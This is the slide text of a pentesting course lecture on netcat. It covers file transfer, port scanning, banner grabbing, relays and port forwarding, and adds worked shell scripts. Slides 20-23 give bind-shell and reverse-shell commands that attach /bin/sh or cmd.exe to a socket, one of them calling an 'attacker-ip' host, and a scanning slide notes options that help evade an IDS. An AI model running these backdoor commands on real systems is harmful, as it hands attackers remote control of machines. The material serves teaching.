
1 COMP265 - Pentesting netcat

2 What?
Like cat, but for networks
Standard input is sent over the network to a remote ip:port
Packets from the network are sent to standard output
Low level
Versatile
“The network Swiss army knife”

3 Basic Operation
Client mode:
–Connects to a specific remote port
Listen mode:
–Waits for a connection on a port
Both modes:
–Send standard input to the network
–Data from the network is sent to standard output
–Messages from netcat itself go to standard error
Packets can have source routing attached (the -g option, below)

4 Netcat Command
May be the two-letter command “nc”
–Like cp and other traditional two-letter unix commands
–nc [options] hostname ports
May be the word “netcat”
Another variant is “ncat”, from the nmap project
–Supports a few more options (for example SSL and --sh-exec)
Which one you get depends on the platform; Kali has both
Sometimes you have to compile from source to get all options (SuSE)

5 Command Options
-l          listen mode, for inbound connects
-L          “listen harder”: persistent listener that re-listens after the client disconnects (Windows netcat only)
-n          numeric-only IP addresses, no DNS
-p port     local port number
-r          randomize local and remote ports
-s addr     local source address
-u          UDP mode
--sctp      SCTP mode (ncat; not in the traditional netcat)
-v          verbose [use twice to be more verbose]

6 Command Options
-i secs     delay interval for lines sent, ports scanned
-t          answer TELNET negotiation
-w secs     timeout for connects and final net reads
-z          zero-I/O mode [used for scanning]
These three options are not available on some packages:
-o file     or -x file: (hex) dump of traffic
-e prog     or -c command: program to exec after connect
-g gateway  source-routing hop point[s], up to 8

7 What for?
Send files
Telnet replacement
Backdoor
Port scan
Banner grabbing
Reverse shell
Relay (proxy)
Port forward
Replay

8 Arguments
Host can be a name or an IP
-n = no DNS lookups, IP only; otherwise a full DNS forward and reverse lookup is done
-v or -vv = verbose messages, always sent to standard error
-w limits the wait time; -w 3 is recommended
-o filename produces a dump of all traffic
> or < redirect output or input, | pipes
-i slows down sending, used if input comes from a file

9 Send Files
Sender (listens and serves the file once):
–nc -l -p 80 < file.txt
–cat file.txt | nc -l -p 80
Receiver (connects and saves whatever arrives):
–nc sender-host 80 > file.txt
Note the use of redirect and pipe
The receiver could have been a web browser, since the listener is on port 80 (older browsers accepted such header-less HTTP/0.9 responses)
<, > and | all enhance the power of netcat
Caveat: nothing is authenticated or encrypted; whoever reaches port 80 first gets the file

10 Another Example
Image a partition and pull it across the network (the listener is the sender):
dd if=/dev/sda3 | gzip | nc -l 80
nc sender-host 80 > sda3.img.gz
Or, the listener can be the receiver:
nc -w 3 -l 80 > home.cmb.tar.gz
tar -cvf - /home/cmb | gzip | nc receiver-host 80
Use -l -p 80 for the traditional netcat; tar and gzip run on the sending side, and -w 3 on the listener ends the session 3 seconds after the last data arrives
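Worked example for the transfers on slides 9 and 10, added here and not part of the slides: a sender/receiver pair in POSIX sh that wraps the netcat transfer and checks the received file against a checksum announced out of band, so a transfer cut short by the -w timeout is noticed instead of silently producing a truncated file. The function names, the port 9000 and the host names are assumptions; cksum is used because it is POSIX (swap in sha256sum where available).

```shell
#!/bin/sh
# Added example: netcat file transfer with an integrity check.
# Assumes the traditional netcat syntax (nc -l -p PORT); use `nc -l PORT` with OpenBSD nc or ncat.
# Helper names (checksum_of, serve_file, fetch_file, verify_transfer) are ours, not netcat's.

PORT=9000   # assumed; the slide uses 80 so that a browser can fetch the file too

# CRC and byte count of a file, as printed by POSIX cksum on stdin: "<crc> <bytes>".
checksum_of() {
    cksum < "$1" | awk '{ print $1, $2 }'
}

# Sender side: announce the checksum (out of band, on stderr), then serve the file once.
# -w 3 makes the listener exit 3 s after its last network read instead of hanging forever.
serve_file() {
    file=$1
    echo "expected: $(checksum_of "$file")" >&2
    nc -w 3 -l -p "$PORT" < "$file"
}

# Receiver side: pull the file, then compare it with the checksum the sender announced.
fetch_file() {
    host=$1; out=$2; expected=$3
    nc -w 3 "$host" "$PORT" > "$out"
    verify_transfer "$out" "$expected"
}

# Returns 0 when the local file matches "<crc> <bytes>", 1 otherwise.
verify_transfer() {
    got=$(checksum_of "$1")
    if [ "$got" = "$2" ]; then
        echo "ok: $1 ($got)"
        return 0
    fi
    echo "MISMATCH: $1 got '$got', expected '$2'" >&2
    return 1
}
```

On the sender run `serve_file /tmp/file.txt` and note the "expected:" line; on the receiver run `fetch_file sender-host /tmp/file.txt "<crc> <bytes>"`. A non-zero exit means the file is short or corrupted and the transfer should be repeated.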

11 nc vs telnet
cmblap:~ # telnet mail-host 25
Trying ...
Connected to mail-host.
Escape character is '^]'.
220 ESMTP
^C
^]
telnet> quit
Connection closed.
cmblap:~ # netcat mail-host 25
220 ESMTP
helo
250
quit
221
cmblap:~ #

12 As a telnet client
Netcat quits when you want it to (Ctrl-C works)
Doesn't stop at standard input EOF: it keeps reading from the network until the remote side closes, so `echo QUIT | nc host 25` still shows the reply
Doesn't require an escape character
Less cruft
Transfers arbitrary binary data
A better utility for probing services
Can use UDP
-t responds automatically to telnet option negotiations

13 Probing?
Netcat can do port scans
This took around 1 sec:
cmblap:~ # netcat -v -w 2 -z target-host 20-1000
[] 631 (ipp) open
[] 445 (microsoft-ds) open
[] 139 (netbios-ssn) open
[] 111 (sunrpc) open
[] 110 (pop3) open
[] 80 (http) open
[] 53 (domain) open
[] 25 (smtp) open
[] 24 (?) open
[] 22 (ssh) open
cmblap:~ #

14 UDP scans too
These are much slower
cmblap:~ # netcat -v -w 2 -z -u target-host 20-100
[] 67 (bootps) open
[] 53 (domain) open
Caveat: for UDP, “open” only means that no ICMP port-unreachable came back within -w seconds, so filtered ports look open too

15 Scanning Options
-i
–Delay interval to slow down scans
-r
–Randomise the port order, including the source port
-z
–Send no data (TCP) or minimal data (UDP)
-i and -r help to avoid an IDS
-vv also reports closed ports
Without -r, netcat works through a range from the highest port down to the lowest, as the output above shows

16 Fancier Scan
Send a line to every port so that services answer with a banner (no -z here, so data flows):
echo QUIT | nc -v -w 5 target-host 20-250 500-600 5990-7000

17 Banner Grabbing
cmblap:~ # netcat -v target-host 110
[] 110 (pop3) open
+OK Hello there.
quit
+OK Better luck next time.
cmblap:~ # netcat -v target-host 25
[] 25 (smtp) open
220 ESMTP
quit
221
cmblap:~ # netcat -v target-host 22
[] 22 (ssh) open
SSH-1.99-OpenSSH_4.1
quit
Protocol mismatch.
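Worked example tying slides 13, 16 and 17 together, added here and not part of the slides: a small POSIX sh toolkit that turns the stderr chatter of a `nc -v -z` scan into a clean list of open ports, picks a protocol-appropriate first line for each port (the SSH and POP3 output above shows why a blank QUIT is not always the right probe), and then banner-grabs each open port with a timeout. The function names, the sample scan output and the 192.0.2.10 address are constructed for the example; the real scan and grab steps call nc and need a reachable target.

```shell
#!/bin/sh
# Added example: parse a netcat -v -z scan and banner-grab the open ports.
# Helper names (parse_nc_scan, probe_string, grab_banners) are ours, not netcat's.

# Turn scan chatter into a sorted list of open port numbers, one per line.
# Handles the traditional netcat line   "host [ip] 22 (ssh) open"
# and the OpenBSD nc / Debian line      "Connection to ip 22 port [tcp/ssh] succeeded!".
parse_nc_scan() {
    sed -n \
        -e 's/^.*] \([0-9][0-9]*\) ([^)]*) open$/\1/p' \
        -e 's/^Connection to .* \([0-9][0-9]*\) port \[[^]]*] succeeded!$/\1/p' |
    sort -n -u
}

# Constructed sample of `nc -v -w 2 -z target 20-1000` stderr (traditional format;
# note the descending port order netcat uses without -r).
SAMPLE_SCAN='target [192.0.2.10] 631 (ipp) open
target [192.0.2.10] 445 (microsoft-ds) open
target [192.0.2.10] 22 (ssh) open
target [192.0.2.10] 80 (http) open
target [192.0.2.10] 53 (domain) open'

# Constructed sample of the same scan with the OpenBSD-style nc (refused ports included).
SAMPLE_OPENBSD='Connection to 192.0.2.10 22 port [tcp/ssh] succeeded!
nc: connect to 192.0.2.10 port 23 (tcp) failed: Connection refused
Connection to 192.0.2.10 443 port [tcp/https] succeeded!'

# First line to send so that the service answers. Empty for services that speak
# first (SSH, SMTP) or would reject junk, as "Protocol mismatch." on slide 17 shows.
probe_string() {
    case "$1" in
        25|587) printf 'QUIT\r\n' ;;
        80|8080) printf 'HEAD / HTTP/1.0\r\n\r\n' ;;
        110) printf 'QUIT\r\n' ;;
        *) printf '' ;;
    esac
}

# Banner-grab every port read from stdin on host $1, 3 s timeout, first 3 lines.
# Real use:  nc -v -w 2 -z target-host 20-1000 2>&1 | parse_nc_scan | grab_banners target-host
grab_banners() {
    host=$1
    while read -r port; do
        echo "=== $host:$port ==="
        probe_string "$port" | nc -w 3 "$host" "$port" 2>/dev/null | head -n 3
    done
}
```

The 2>&1 in the real pipeline matters: netcat writes the scan results to standard error (slide 8), so without it parse_nc_scan sees nothing.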

18 Chat Session
Just for fun
Machine 1
–nc -l -p 1234
Machine 2
–nc machine1 1234
Both machines' keyboard input appears on the other machine's screen
Note: use the -v option to diagnose any problems that appear

19 Web Browser
printf 'GET / HTTP/1.0\r\nHost: address\r\n\r\n' | nc address 80 > page.html
The bare `echo GET | nc address 80` form only works against servers that still accept HTTP/0.9 requests; with a real request line the response headers land in page.html too

20 Backdoor
By connecting the network socket to a command interpreter's standard input and output (-e), we create a remote shell
cmblap:/usr/local/src/netcat-0.7.1/src # ./netcat -l -n -v -s addr -p 1234 -e /bin/sh
Connection from
cmblap:/usr/local/src/netcat-0.7.1/src #
I had to download and build to enable the -e switch
Cannot pass parameters to the program given to -e

21 On the other end
pdlnx2:~ # netcat -v cmblap 1234
DNS fwd/rev mismatch: != cmblap
[] 1234 (search-agent) open
df
Filesystem     1K-blocks     Used Available Use% Mounted on
/dev/sda6       20641788  7448780  12144368  39% /
udev             1540268      192   1540076   1% /dev
/dev/sda2       39942856  8711724  31231132  22% /windows/C
/dev/sda8       20650996 17395552   2206404  89% /home/cmb
exit
pdlnx2:~ #

22 More backdoors
On Windows: nc -L -p 1234 -d -e cmd.exe
-L means listen harder
–Re-listens after the client disconnects, so the backdoor survives the first session
–Not available on unix; wrap the listener in a shell loop instead
-d means detach from the console (no window)
–Also not needed on Linux

23 “Shoveling” a Shell
Aka reverse shell
The compromised machine cannot accept connections
–It has to initiate connections because of a firewall/NAT
Attacker listens from outside the firewall
–netcat -v -l -p 1234
A script on the compromised machine starts a shell and connects it to the attacker
–netcat attacker-ip 1234 -e /bin/sh
The script has to run forever, or at timed intervals, or in response to some event
Either way the shell traffic is plaintext and the outbound connection appears in firewall and flow logs, which is what defenders look for

24 Port Forwarding
Forwarding localhost port 8080 to port 80 on a remote host:
ncat -l localhost 8080 --sh-exec "ncat target-host 80"
ncat runs the --sh-exec command for each accepted connection and wires the client socket to its stdin/stdout
The traditional netcat has no --sh-exec; there a named pipe joins two netcats back to back
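Worked example for the relay on slide 24, added here and not part of the slides: a port forwarder built from two traditional netcats and a named pipe, for systems whose nc was built without -e, -c or --sh-exec. The function names (check_port, relay) and the hosts and ports are assumptions; the port check runs offline, the relay itself needs nc and a reachable target.

```shell
#!/bin/sh
# Added example: TCP relay (port forward) from two traditional netcats and a fifo.
# Helper names (check_port, relay) are ours, not netcat's.

# 0 if $1 is a usable TCP port number, 1 otherwise (rejects "", "80x", 0 and 70000).
check_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# relay LOCAL_PORT REMOTE_HOST REMOTE_PORT
# Client data: nc -l stdout -> pipe -> nc remote stdin.
# Replies:     nc remote stdout -> fifo -> nc -l stdin.
# Both nc processes start together, so the blocking fifo opens pair up.
# Serves one connection; wrap it as `while relay 8080 target-host 80; do :; done` to stay up.
relay() {
    lport=$1; rhost=$2; rport=$3
    check_port "$lport" && check_port "$rport" || { echo "relay: bad port" >&2; return 2; }
    fifo=$(mktemp -u) || return 1
    mkfifo -m 600 "$fifo" || return 1      # private: anyone who can open the fifo can inject
    nc -l -p "$lport" < "$fifo" | nc -w 5 "$rhost" "$rport" > "$fifo"
    rc=$?
    rm -f "$fifo"
    return $rc
}

# The same relay with the other netcats:
#   ncat -l localhost 8080 --sh-exec "ncat target-host 80"     (ncat, one process, per-client child)
#   nc -l -p 8080 -c "nc target-host 80"                        (where the package has -c, slide 6)
```

Note that the fifo relay, unlike the ncat form, handles a single client and then exits, which is why the loop in the comment is needed for anything more than a one-off.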

25 References
ncat
–User's guide is a good reference
netcat
Don't forget the man pages

26 Lab
Lab today will exercise many of these functions
Due the day of the lab next week, Feb 18
–No new lab next week
